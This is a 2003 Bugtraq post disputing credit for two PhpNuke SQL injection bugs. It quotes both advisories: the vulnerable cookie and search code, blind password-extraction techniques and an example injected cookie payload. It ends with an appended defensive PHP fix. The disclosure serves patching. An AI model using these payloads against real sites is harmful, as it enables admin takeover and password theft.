[28978] in bugtraq


RE: PHPNuke SQL Injection

daemon@ATHENA.MIT.EDU (Oriol Carreas)
Fri Feb 21 18:01:43 2003

From: Oriol Carreas <uri@7a69ezine.org>
Reply-To: uri@7a69ezine.org
To: bugtraq@securityfocus.com
Date: Fri, 21 Feb 2003 05:26:09 +0100
Message-Id: <200302210524.32267.ripe@7a69ezine.org>

I don't like to claim authorship of bugs, because it is not
possible to clarify who discovered/exploited some bug first, because
sometimes we are too lazy to publish them for any reason. But this
is a special case, because the person that claims authorship
of the TWO "PhpNuke SQL Injection" bugs has discovered them at the same
time as me and exploits them _exactly_ the same way as me, so I
think that it cannot be a coincidence.

I've been testing the methods of exploitation this last week and it
is possible that "David Zenter" (the person who wrote that advisory)
found that kind of attack, programmed an exploit for them and
finally wrote the advisory, stealing the authorship of these 2 bugs.
I am not sure of that, so I would like him to answer.

I discovered the $user bug one month ago (in fact I searched the
website and I found that RFP found them some years ago, but he
didn't publish a successful way to exploit them).
I contacted Francisco Bucci, the author of PhpNuke, and I suggested
some patches to him (and he published the patches on his website),
but PhpNuke still had a lot of bugs, so I waited to finish my job to
publish them.

PhpNuke has been here for a long time, so I don't believe that a
person finds the same _TWO_ bugs as me and exploits them in the
same way, so I want "David Zenter" to clarify that.

I am developing other vulnerabilities; what is very strange for
me is that the 2 that I've developed are the ones that
"David Zenter" published.

Now I attach the two advisories and the two exploits that I had
written for these bugs; judge for yourself if you think that this
can be a coincidence.

P.S. Excuse my poor English :)

;==================================================================
PHPNUKE is_user || is_admin VULNERABILITY
;==================================================================

General Data :
--------------
        Application     : PhpNuke.
        Versions        : <= 6.5 (without the patch).
        Vulnerability   : SQL injection in the cookies user and admin.
                        : Access to the application at administration level
                          OR guess any user password.

Introduction:
-------------
        PhpNuke is a well known content management system programmed
in PHP by Francisco Bucci; a lot of people use it because it is very
easy to install and manage.

        PhpNuke doesn't check the integrity of the cookies "user" and
"admin" that it uses to follow sessions, so it is possible to inject SQL
code and get the administration password. These cookies are encoded
using base64, so the "magic quotes" protection of PHP is not working.

Vulnerability:
--------------

       The vulnerable function is found in the file "mainfile.php" :

-------------------------------------------------------------------------------
        function is_user($user) {
            global $prefix;
            if(!is_array($user)) {
                $user = base64_decode($user);
                $user = explode(":", $user);
                $uid = "$user[0]";
                $pwd = "$user[2]";
            } else {
                $uid = "$user[0]";
                $pwd = "$user[2]";
            }
            // $uid comes from the decoded cookie and is placed in the query unchecked
            $result=mysql_query("select pass from $prefix"._users."
                                                  where uid='$uid'");

            list($pass)=mysql_fetch_row($result);
            if($pass == $pwd && $pass != "") {
                return 1;
            }
            return 0;
        }
-------------------------------------------------------------------------------

        The function is_admin is almost like the other one.

        There is no other integrity check on the cookie $user in the PhpNuke
code, so it is possible to inject SQL code in this way:

        $user = base64_encode("uiduser' CODIGOSQL:noimporant:passowrd");

        Most PhpNuke websites use MySQL 3.x, so it is not possible to use UNION,
so initially it seems difficult to exploit.

Way to exploit:
---------------
        To get information from that query we need a valid PhpNuke user, but
that is very easy because PhpNuke lets anybody create a user easily. Once we
have a valid userid and a valid password we can send a query like:

        SELECT pass from nuke_users where uid='<target_uid>'
                AND  pass LIKE '<test>' OR uid='<our_uid>'

        This SELECT will give the password of "target_uid" if <test> is
correct, or our password if that test is not correct. So we can retrieve
information from that query by seeing whether we are logged in or not. This
allows us to bruteforce the target password with LIKEs (we only check one
character at a time).

        PhpNuke uses md5 in version 6.x (crypt in versions 5.x); that gives
an average of 32*(16/2) = 256 tries to get a valid password.

        I have tested this method and it is possible to get a valid password
within 10 minutes.

Example of a cookie using this method:

        user = base64_encode("2' AND pass LIKE
'a12bc___________________________' OR
uid='5612:noimportant:1234567889012345678901234567890ab");

        Where '_' in LIKEs means any character.

Using that method we can find the cookie of _any_ user in PhpNuke. In PhpNuke
5.x (I think) it is not possible to go further, but in PhpNuke 6.x we can
use the fact that the admin password is stored in nuke_authors and in
nuke_users.

In the test that I've done, the uid=2 in nuke_users is the uid=1=admin in
nuke_authors.


Patches:
--------
        There is a patch for this vulnerability on PhpNuke's website, but I
must say that PhpNuke seems to have some other vulnerabilities not yet
published.

Credit:
--------
        I found this vulnerability one month ago. I didn't believe that this
vulnerability could be in PhpNuke!!, because it is widely used and a lot of
people had already audited it before me, so I searched in Google to find
that vulnerability. I found that RFP had discovered that some years ago, in
PhpNuke 4.x !!! WooW, and it is still in PhpNuke!! :? RFP didn't find a way
to exploit that, but he discovered this vuln.


;==================================================================
PHPNUKE Search vulnerability
;==================================================================

General data :
--------------
        Application     : PhpNuke.
        Versions        : <= 6.5 (without the patch).
        Vulnerability   : SQL injection in the search form.
                        : Access to the application at administration level
                          OR guess any user password.

Introduction:
-------------
        PhpNuke is a well known content management system programmed
in PHP by Francisco Bucci; a lot of people use it because it is very
easy to install and manage.

        PhpNuke doesn't check that the parameter "category" in the search form
is numeric, and when it builds the SQL query it does not enclose it
in quotes, so it is easy to inject SQL code. Quotes will not be allowed
in this code because the "magic quotes" protection of phpnuke would add
slashes to them.

Vulnerability:
--------------

        The vulnerable code is in modules/Search/index.php in PhpNuke 6.x
                           and in /search.php in PhpNuke 5.x

-------------------------------------------------------------------------------
  // $category is placed in the query unquoted and without a numeric check
  if ($category > 0) {
      $categ = "AND catid=$category ";
  } elseif ($category == 0) {
      $categ = "";
  }
  $q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext,
        a.url, s.comments, s.topic from ".$prefix. "_stories s, ".$prefix."_authors
        a where s.aid=a.aid $queryalang $categ";
-------------------------------------------------------------------------------

        This query is done using the nuke_authors table (with the variable
'a'), so it is possible to get the admin password using a technique similar to
the last advisory.


Exploitation Method:
--------------------
        As I said in the last advisory, PhpNuke mainly uses MySQL 3.x, so it is
not possible to use UNIONs to get the admin password (in this case it would
be possible to get the admin password string directly with unions).

        But we can use a similar technique to the last advisory, but without
using quotes, if we inject:

        AND MID(a.pwd,characternumber,1) = CHAR( characterascii)

        If characterascii is valid the query will give us the search result,
otherwise it won't give us anything. This allows us to bruteforce the
administration password, which can be done in less than 10 minutes.

        Other parameters can be retrieved using this technique:

                * a.uname : needed to log in to phpnuke using the admin cookie.
                * user()  : mysql user, if it is root we can use some
                            techniques like creating a file etc ...
                * database()
                * useyouimagination ...

Patches:
--------
        As far as I am concerned there is not an official patch, but a
workaround is very easy: you just have to quote the 'category' parameter
and test that it is a numeric field.

Credit:
--------
        I don't know anybody who has already discovered that. If you feel that
I am not correct please contact me.

        Vulnerability developed by :    Oriol Carreras - <uri@7a69ezine.org>




-- 
>===============================
>
> http://ripe.7a69ezine.org
>===============================
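
The two checks the advisories above call for (an integrity check on the decoded "user" cookie, and a numeric "category" that is never concatenated into the query), as an added example that is not part of the original post or of PhpNuke's code. It assumes a PDO connection and the nuke_users (uid, pass) layout quoted above; parse_user_cookie, is_user_hardened and category_filter are hypothetical names.

```php
<?php
// Added example, not PhpNuke code. Assumes PHP 7.1+, a PDO handle, and the
// <prefix>_users (uid, pass) table from the advisory; function names are hypothetical.

/** Decode the "user" cookie; return [uid, pwd] or null when it is malformed. */
function parse_user_cookie(string $cookie): ?array {
    $raw = base64_decode($cookie, true);       // strict mode rejects non-base64 input
    if ($raw === false) {
        return null;
    }
    $parts = explode(':', $raw);
    if (count($parts) < 3 || !ctype_digit($parts[0])) {
        return null;                           // uid field must be digits only
    }
    return [(int) $parts[0], $parts[2]];
}

/** Same decision as is_user(), with validation and a bound parameter. */
function is_user_hardened(PDO $db, string $prefix, string $cookie): bool {
    $fields = parse_user_cookie($cookie);
    if ($fields === null) {
        return false;
    }
    [$uid, $pwd] = $fields;
    // $prefix is site configuration, not request data; $uid is bound, so
    // nothing taken from the cookie is ever part of the SQL text.
    $stmt = $db->prepare("SELECT pass FROM {$prefix}_users WHERE uid = ?");
    $stmt->execute([$uid]);
    $pass = $stmt->fetchColumn();
    return is_string($pass) && $pass !== '' && hash_equals($pass, $pwd);
}

/** Search form: returns [sql_fragment, bound_values] for the category filter. */
function category_filter($category): array {
    $id = filter_var($category, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false || $id === 0) {
        return ['', []];                       // not a positive integer: no filter
    }
    return ['AND catid = ?', [$id]];
}

// Constructed sample inputs, shaped like the values discussed in the advisories.
$bad = base64_encode("2' AND pass LIKE 'a%' OR uid='5612:x:y");
var_dump(parse_user_cookie($bad));
var_dump(parse_user_cookie(base64_encode('2:name:hash')));
var_dump(category_filter('1 AND 1=1'));
var_dump(category_filter('3'));
```

The first and third sample inputs are rejected before any query is built; the second and fourth pass validation and reach the database only as bound values.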

